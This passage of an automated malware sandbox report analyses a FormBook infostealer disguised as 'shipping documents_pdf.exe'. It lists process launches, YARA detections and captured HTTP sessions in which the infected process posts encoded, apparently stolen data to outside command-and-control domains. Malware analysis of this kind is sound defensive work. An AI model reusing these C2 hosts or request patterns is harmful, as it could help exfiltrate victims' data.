GX4dS=E6m5Tw18mWz7CJsxdhO9gEXZfTVCl1zwtGnk7Soifh6IhYbCbehm+OdR5fCXDHhBbheD7w7TWMFtqJc7Yy0yAnMN0EjzEhjrIC9hXKkB0K91vNcTyAx1eOxAo30PdJ37DRozhsjZVWrPSxNTcW04iri5x8Px9oawW2ttBFmekzGflMHxOLcy4cyf237iXO1LrepeBzmsx99kKPCL6GZjtNCr2xGFIpgByjMFukHnW1UlzeKTBsgVTA6wau+3n5wizpc9f8hYuH4qbwMQCl0ySX689pyUWMHNEjtpAab6P70z3eMJ/bhwih6jB3fN55abRabZMxwalxc5Ze5NVL2JRvzpCmPyPyNp8KWORYrxxexvyocD2mPZsvF80OFRtXxxbaQJDsEX1/udnxbGAcnjZFWkInkJ74Wfsfw6sFQOetvL+4tlf8zn2DK7GcntPYzcWE8J85Br/b5CJRvJglmGBIRPWnCDXVcDl3SsQtdMgjq2CMvqsemcr7Yb4TBUpnh6zUfWX7HoIm9t0hTYjhUEuhbbH5J27oXhEouinH+hneNPXrDgFw9reQ8TP8Jz57gIKeN63m/N6q6WT7jVV7Lat0adTJo/a3+nJTR8ywU9uyXwWRHQLL17v5mUyAMkVzYykD1a9mJFvzsATgNZ2D6C8cYzEQ21qqe4P4SLo2Pyn5d191P3KDWD+48ZW1gwTyi8meW01FZQTobP/6/3AouaeXZmlrRlVnK1Ep9g+ihorfBJjDOcVKIea5Kab211uRhZa2Tg0ifWf+XdmfXbpefqFKGgODrI9vUjMZu18GIckhByKxtHAOd0UhavsJRYbEZlX47/nyNBkOJ5LMaFpTwnqqD5XsPSaqWybKdEyN8kvtr08mU5yCXVctvi6HW5cSrhKZYYjP7DA+/d4OZWD24fJ73OYbSlrwHFEMhJaGv3F5lm3tqxZ4BGynMDS/0dGbAxJURCvC17yGqqEyIc1eShqEwpZpYMBpwQlJOEVkJeYIQXtB [TRUNCATED]
Sep 30, 2024 08:32:57.449630022 CEST	393	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 06:32:57 GMT Server: Apache/2.4.6 (CentOS) PHP/7.2.34 Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 36 68 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /v6hi/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	57422	8.217.17.192	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:59.002780914 CEST	473	OUT	GET /v6hi/?GX4dS=J4OZQFJkwHb7CqxUSgK5kC7bOCRQ1HDFuBm9sh8+Hwi6g72gNv5/qcE3wP+eGlRxbFCI7z2mPoN0ns0tJj8yIlhQwyv+KQ3WGhFwXvk/5rV44M5qziNnSOc=&QHdD=Mr7PG HTTP/1.1 Host: www.meliorahomes.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	57423	85.159.66.93	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:33:25.509095907 CEST	753	OUT	POST /vyi4/ HTTP/1.1 Host: www.restobarbebek.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.restobarbebek.xyz Referer: http://www.restobarbebek.xyz/vyi4/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 202 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 79 7a 61 55 71 70 45 76 64 71 77 42 6a 67 43 44 46 35 7a 6b 6d 41 72 78 70 30 74 56 78 33 49 48 57 52 63 35 4d 58 71 47 34 54 70 56 4c 54 36 4b 51 73 62 61 73 77 35 4a 52 2f 6d 52 42 6d 6b 54 47 75 56 70 34 2b 6f 66 61 43 56 45 63 47 6f 59 35 41 70 2f 50 72 68 6c 4c 68 50 66 62 4a 49 70 34 6b 31 49 79 63 2b 32 52 6e 45 4e 65 59 73 47 68 36 43 4b 54 74 6e 51 2b 47 5a 46 39 48 69 5a 45 4b 63 49 2b 52 33 68 63 56 4a 43 38 45 31 48 2f 6b 76 42 67 4a 4f 52 5a 79 4c 42 63 70 6b 6f 67 71 41 63 43 6a 74 32 4b 48 5a 62 6e 42 32 4b 38 6d 4a 58 78 4a 4a 4b 4c 2f 38 6f 67 48 72 52 59 51 3d 3d Data Ascii: GX4dS=yzaUqpEvdqwBjgCDF5zkmArxp0tVx3IHWRc5MXqG4TpVLT6KQsbasw5JR/mRBmkTGuVp4+ofaCVEcGoY5Ap/PrhlLhPfbJIp4k1Iyc+2RnENeYsGh6CKTtnQ+GZF9HiZEKcI+R3hcVJC8E1H/kvBgJORZyLBcpkogqAcCjt2KHZbnB2K8mJXxJJKL/8ogHrRYQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	57424	85.159.66.93	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:33:28.050031900 CEST	773	OUT	POST /vyi4/ HTTP/1.1 Host: www.restobarbebek.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.restobarbebek.xyz Referer: http://www.restobarbebek.xyz/vyi4/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 222 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 79 7a 61 55 71 70 45 76 64 71 77 42 67 41 53 44 4a 2b 76 6b 75 41 72 79 77 45 74 56 6d 6e 49 4c 57 52 67 35 4d 53 47 57 34 6d 42 56 4b 7a 71 4b 52 74 62 61 72 77 35 4a 49 50 6e 62 4d 47 6b 59 47 75 4a 51 34 38 38 66 61 43 42 45 63 47 34 59 35 78 70 77 4f 37 68 6e 65 78 50 64 45 5a 49 70 34 6b 31 49 79 63 37 64 52 6e 4d 4e 65 70 63 47 69 62 43 4e 66 4e 6e 54 35 47 5a 46 71 58 6a 51 45 4b 63 36 2b 55 54 4c 63 58 42 43 38 47 74 48 2f 31 76 43 70 4a 4f 58 58 53 4c 56 59 70 4a 44 6c 2b 5a 69 4c 42 78 69 58 55 5a 32 69 48 6e 51 74 58 6f 41 6a 4a 74 35 57 34 31 63 74 45 57 59 44 65 4a 39 46 66 6d 74 35 4e 39 77 76 58 68 4e 74 44 66 32 4d 50 34 3d Data Ascii: GX4dS=yzaUqpEvdqwBgASDJ+vkuArywEtVmnILWRg5MSGW4mBVKzqKRtbarw5JIPnbMGkYGuJQ488faCBEcG4Y5xpwO7hnexPdEZIp4k1Iyc7dRnMNepcGibCNfNnT5GZFqXjQEKc6+UTLcXBC8GtH/1vCpJOXXSLVYpJDl+ZiLBxiXUZ2iHnQtXoAjJt5W41ctEWYDeJ9Ffmt5N9wvXhNtDf2MP4=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	57425	85.159.66.93	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:33:30.596189022 CEST	10855	OUT	POST /vyi4/ HTTP/1.1 Host: www.restobarbebek.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.restobarbebek.xyz Referer: http://www.restobarbebek.xyz/vyi4/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10302 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 79 7a 61 55 71 70 45 76 64 71 77 42 67 41 53 44 4a 2b 76 6b 75 41 72 79 77 45 74 56 6d 6e 49 4c 57 52 67 35 4d 53 47 57 34 6d 5a 56 4c 42 53 4b 54 4f 44 61 71 77 35 4a 41 76 6e 61 4d 47 6b 46 47 75 52 55 34 38 67 70 61 45 4e 45 63 6c 67 59 78 6c 31 77 41 37 68 6e 42 42 50 63 62 4a 49 38 34 6b 6c 4d 79 64 4c 64 52 6e 4d 4e 65 71 45 47 32 61 43 4e 5a 4e 6e 51 2b 47 5a 42 39 48 6a 38 45 4b 46 4e 2b 55 58 78 66 6d 68 43 38 6d 39 48 77 6e 48 43 6d 4a 4f 56 55 53 4b 53 59 70 46 63 6c 2f 77 54 4c 41 46 49 58 54 70 32 69 67 4f 52 38 47 73 34 2f 37 35 6c 55 49 74 43 6d 47 2b 31 4d 4d 30 41 49 2b 71 43 73 4a 31 54 79 47 55 56 33 54 6e 51 61 49 57 71 50 69 32 6b 44 6f 6a 2b 4e 64 65 65 35 51 63 34 35 51 4e 2b 4f 6c 36 51 6a 69 68 5a 43 4d 6e 6f 7a 59 67 62 31 67 4a 37 47 6d 6b 31 51 56 43 4e 78 57 52 59 76 66 48 45 74 6b 6e 32 43 71 37 55 36 61 4d 4e 37 39 6d 35 4c 35 44 63 36 59 46 34 4b 7a 6f 76 59 41 47 2f 68 36 72 6b 78 73 31 6b 48 59 30 66 34 36 63 78 31 79 34 78 74 55 43 52 5a 68 65 70 [TRUNCATED] Data Ascii: GX4dS=yzaUqpEvdqwBgASDJ+vkuArywEtVmnILWRg5MSGW4mZVLBSKTODaqw5JAvnaMGkFGuRU48gpaENEclgYxl1wA7hnBBPcbJI84klMydLdRnMNeqEG2aCNZNnQ+GZB9Hj8EKFN+UXxfmhC8m9HwnHCmJOVUSKSYpFcl/wTLAFIXTp2igOR8Gs4/75lUItCmG+1MM0AI+qCsJ1TyGUV3TnQaIWqPi2kDoj+Ndee5Qc45QN+Ol6QjihZCMnozYgb1gJ7Gmk1QVCNxWRYvfHEtkn2Cq7U6aMN79m5L5Dc6YF4KzovYAG/h6rkxs1kHY0f46cx1y4xtUCRZhepLOVdT/wGOp89jP9mkL6127mjUY32YJMr3SxsEtN/iEvWXQCdwj/aIHhov1M2ewa10dsaIpxx7Px9tE8piiMZh0AuQido5NYH3As+jAFHo5R8ufVSlqlMRACccrSzccLa3VMylbI+rA5EdnlyhrTrpGU5aNgytos8GwGeFEraG1mKkRhS3h+1RFPk+c76qOOF2TBFhtjjeGJ8dlm5Ss9ps5WoH6uzplk9HsAelHsYCgQb8S18o4H8hGPYOM7753jiBKWxgpm6myP7FbN4x5in+6uoZ8KyS8TGnvU8phTQPpvkItVaamfHnMxt15RRhDRqQei2B1KF38LNsERcfIpjBT/5Cuy1ytWAhLS3uj1xm7e39bj2IVMiJ3ywtQ8iO2CroEqsDBhQfss00kX4cnTfqXxrlHoQZPUhFMHeGQPsvBWNHhNZFQaoSW/2pcMda18V7G2IabmOK+qTGYcSaTwIW4soFozXQjVS6zJv7/Z7gwPvKvJyT61uKh4t30ALryNBwNYnQVvb2cSQPJl3vMeIAwQoofJQVKP1MOebB5dogXzUtiLPnrDZZaYFl8YW7eHUdPAiWwQx3XmFwSQrOCmyWXc/KZyDyx6yzWNF4lJ3DtJ4vZ8NmFxIatWr300ZlHI0sQwo55sYaPJWWsZSxkrI6QuM4ggo5ZL9Bz [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	57426	85.159.66.93	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:33:33.138983011 CEST	474	OUT	GET /vyi4/?GX4dS=/xy0pcQoI48O0GHyPYCEmU2R4Hpu0VZORDN/dAaN/HIxdTX0a/Tw+B0GG8XhGWU8PZV29+oHaQZBX3c3szNNFJMBEHP/DJI13k5P4rPNXnp/cIoi/p+Ic+M=&QHdD=Mr7PG HTTP/1.1 Host: www.restobarbebek.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Sep 30, 2024 08:33:33.822935104 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Mon, 30 Sep 2024 06:33:33 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-09-30T06:33:38.7120932Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	57427	13.248.169.48	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:33:38.913414955 CEST	747	OUT	POST /3q2o/ HTTP/1.1 Host: www.mynotebook.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.mynotebook.shop Referer: http://www.mynotebook.shop/3q2o/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 202 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 58 76 31 79 69 58 69 76 48 33 4b 4c 55 4a 63 74 37 30 41 4f 34 79 46 58 47 66 51 41 52 2f 73 48 77 46 44 4e 56 47 68 56 51 61 6a 63 32 6f 53 75 45 36 58 70 4c 36 45 5a 67 6c 4e 5a 4c 4c 6e 66 47 33 69 75 6f 4d 7a 55 6e 7a 45 4f 79 79 70 78 47 63 62 6f 57 2f 32 7a 77 77 42 4f 2b 34 4b 37 66 56 6d 32 73 68 57 56 6f 30 49 49 67 6d 74 4e 4a 53 57 51 37 55 4d 70 66 36 47 70 2b 72 6c 32 30 4b 2b 52 2b 4b 30 45 51 46 7a 35 72 4d 48 4a 62 70 50 6f 41 63 57 73 6a 50 55 55 38 4b 47 6a 61 66 79 64 53 65 36 74 6b 59 71 74 7a 32 71 74 63 70 6b 34 70 59 67 6d 48 38 32 57 6d 36 6c 69 5a 51 3d 3d Data Ascii: GX4dS=Xv1yiXivH3KLUJct70AO4yFXGfQAR/sHwFDNVGhVQajc2oSuE6XpL6EZglNZLLnfG3iuoMzUnzEOyypxGcboW/2zwwBO+4K7fVm2shWVo0IIgmtNJSWQ7UMpf6Gp+rl20K+R+K0EQFz5rMHJbpPoAcWsjPUU8KGjafydSe6tkYqtz2qtcpk4pYgmH82Wm6liZQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	57428	13.248.169.48	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:33:41.453636885 CEST	767	OUT	POST /3q2o/ HTTP/1.1 Host: www.mynotebook.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.mynotebook.shop Referer: http://www.mynotebook.shop/3q2o/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 222 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 58 76 31 79 69 58 69 76 48 33 4b 4c 57 71 45 74 35 58 34 4f 39 53 46 51 61 76 51 41 59 66 73 35 77 46 50 4e 56 48 31 37 52 73 4c 63 78 4e 57 75 57 72 58 70 4d 36 45 5a 6f 46 4e 63 49 37 6e 57 47 32 66 64 6f 4e 66 55 6e 79 67 4f 79 7a 5a 78 46 76 7a 72 57 76 32 78 6f 41 42 4d 7a 59 4b 37 66 56 6d 32 73 68 44 79 6f 77 6b 49 6a 57 39 4e 49 32 4b 54 6c 6b 4d 75 63 36 47 70 36 72 6c 79 30 4b 2f 45 2b 4a 77 69 51 48 37 35 72 4e 58 4a 62 63 37 72 5a 4d 57 71 38 66 56 32 31 34 44 55 53 71 58 41 5a 2f 2f 57 69 4c 65 58 37 51 37 33 4e 59 46 76 37 59 45 56 61 37 2f 69 72 35 59 72 43 63 75 34 56 4b 6e 5a 43 55 42 72 61 6b 4e 37 6b 74 39 70 47 6f 45 3d Data Ascii: GX4dS=Xv1yiXivH3KLWqEt5X4O9SFQavQAYfs5wFPNVH17RsLcxNWuWrXpM6EZoFNcI7nWG2fdoNfUnygOyzZxFvzrWv2xoABMzYK7fVm2shDyowkIjW9NI2KTlkMuc6Gp6rly0K/E+JwiQH75rNXJbc7rZMWq8fV214DUSqXAZ//WiLeX7Q73NYFv7YEVa7/ir5YrCcu4VKnZCUBrakN7kt9pGoE=

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.4	57429	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:33:44.318605900 CEST	10849	OUT	POST /3q2o/ HTTP/1.1 Host: www.mynotebook.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.mynotebook.shop Referer: http://www.mynotebook.shop/3q2o/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10302 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 58 76 31 79 69 58 69 76 48 33 4b 4c 57 71 45 74 35 58 34 4f 39 53 46 51 61 76 51 41 59 66 73 35 77 46 50 4e 56 48 31 37 52 73 44 63 78 37 71 75 45 59 50 70 4e 36 45 5a 6d 6c 4e 64 49 37 6d 47 47 33 33 52 6f 4e 43 6a 6e 78 49 4f 39 78 68 78 41 65 7a 72 64 76 32 78 68 67 42 42 2b 34 4c 78 66 54 47 36 73 68 54 79 6f 77 6b 49 6a 55 31 4e 50 69 57 54 6e 6b 4d 70 66 36 47 74 2b 72 6c 4b 30 4b 6d 2f 2b 4b 63 55 51 32 62 35 72 74 6e 4a 49 61 58 72 52 4d 57 6f 2f 66 56 51 31 35 2f 4c 53 75 33 4d 5a 2f 4b 65 69 4d 32 58 2f 6e 4b 52 65 72 74 6a 6c 36 45 4e 42 4b 62 32 67 59 67 6e 4a 4d 4c 44 62 71 72 72 41 6c 42 38 51 57 78 2f 33 65 64 30 61 39 43 4b 39 36 31 2f 65 6d 76 6c 68 54 2b 4b 2b 6a 53 78 7a 77 72 2f 6e 63 37 4f 57 46 69 72 71 66 4b 65 6d 74 66 78 55 44 6f 6d 50 63 6e 39 4c 4d 7a 62 58 31 45 46 4a 69 57 79 72 59 74 59 34 65 4a 4c 73 41 59 65 65 77 66 46 4d 48 74 46 39 42 6f 48 2f 47 58 73 5a 65 77 45 70 65 2f 36 34 35 31 4b 49 6a 30 63 5a 57 6e 72 57 66 32 79 6d 6b 38 49 74 51 64 2f [TRUNCATED] Data Ascii: GX4dS=Xv1yiXivH3KLWqEt5X4O9SFQavQAYfs5wFPNVH17RsDcx7quEYPpN6EZmlNdI7mGG33RoNCjnxIO9xhxAezrdv2xhgBB+4LxfTG6shTyowkIjU1NPiWTnkMpf6Gt+rlK0Km/+KcUQ2b5rtnJIaXrRMWo/fVQ15/LSu3MZ/KeiM2X/nKRertjl6ENBKb2gYgnJMLDbqrrAlB8QWx/3ed0a9CK961/emvlhT+K+jSxzwr/nc7OWFirqfKemtfxUDomPcn9LMzbX1EFJiWyrYtY4eJLsAYeewfFMHtF9BoH/GXsZewEpe/6451KIj0cZWnrWf2ymk8ItQd/tmfOb1SqUHyQUdqY7qREcvAvwGTD56372kW8vkimw3ydqRTP6C8WqbfT5fGW5pc0aeWsF7gjkX+6ftz716Ns6PwDuA2Lv2vY5y1oJS1JXGgS6Ztq0tevZKLoPGrOlPl0o+JAAxoS7bKuh0XFyrZvGoM0rgiuovv6DFxMTx49tI1b5lrP+XxkN1wSn2Ogkh8loWaGsd03vbqLd3A5GZTHcNu++exRvNWLF1jsCZpF+i/XuUWldgeW3A8lcusYJqIqB7cqQt9hQ5DNr+2NW4qCQwsq7SIJD1jLyJcWBuVx4B0nqdRH5gvcw7+wARBJrydwsEMW6WQK5CIiS0TLNmTwpPyiGU03T3lOnhA5mXd3TVgBktGUVOJM63bS/HuJFdSSHEXN6yXc91Nbsd0k0NHVtLwJH3IT77kN8b/yxfDRxoR6RUh6rXSKW9yainiqa5JD2K9SyPex2k4/dOcDi8zVLRPL3vcFVHUzKlCnvpe7uefEds+vNL9sX0eycCHcOECw5eBQ+GpEH+NgIqaMtC+iiMK4XgY9rfKlEhdBJL7hFtttWiBzGbv6dDX/MGI7LyKqy5Jin/16yrrYtT5Bdoz2DYO8aXVWkKlrNLLSevbwR7XzfOvZd2Q2n0jkO4dCRsvASwRAmnLu0cLJeMZkzNzkuH9Qd3bkZv3lC1 [TRUNCATED]

Target ID:	0
Start time:	02:30:36
Start date:	30/09/2024
Path:	C:\Users\user\Desktop\shipping documents_pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\shipping documents_pdf.exe"
Imagebase:	0x400000
File size:	1'401'815 bytes
MD5 hash:	4F04D4AF743C4C282B7F86F002F8BCAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:30:41
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\shipping documents_pdf.exe"
Imagebase:	0xce0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1889137660.0000000003600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1889137660.0000000003600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1888596212.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1888596212.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:30:51
Start date:	30/09/2024
Path:	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe"
Imagebase:	0x7e0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	02:30:54
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\schtasks.exe"
Imagebase:	0xb10000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3513291317.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3513291317.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3514584308.0000000000800000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3514584308.0000000000800000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3514539139.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3514539139.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	02:31:05
Start date:	30/09/2024
Path:	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe"
Imagebase:	0x7e0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3515959197.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3515959197.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	02:31:17
Start date:	30/09/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	4.7%
Signature Coverage:	7.8%
Total number of Nodes:	128
Total number of Limit Nodes:	7

Executed Functions

Function 00417533 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs
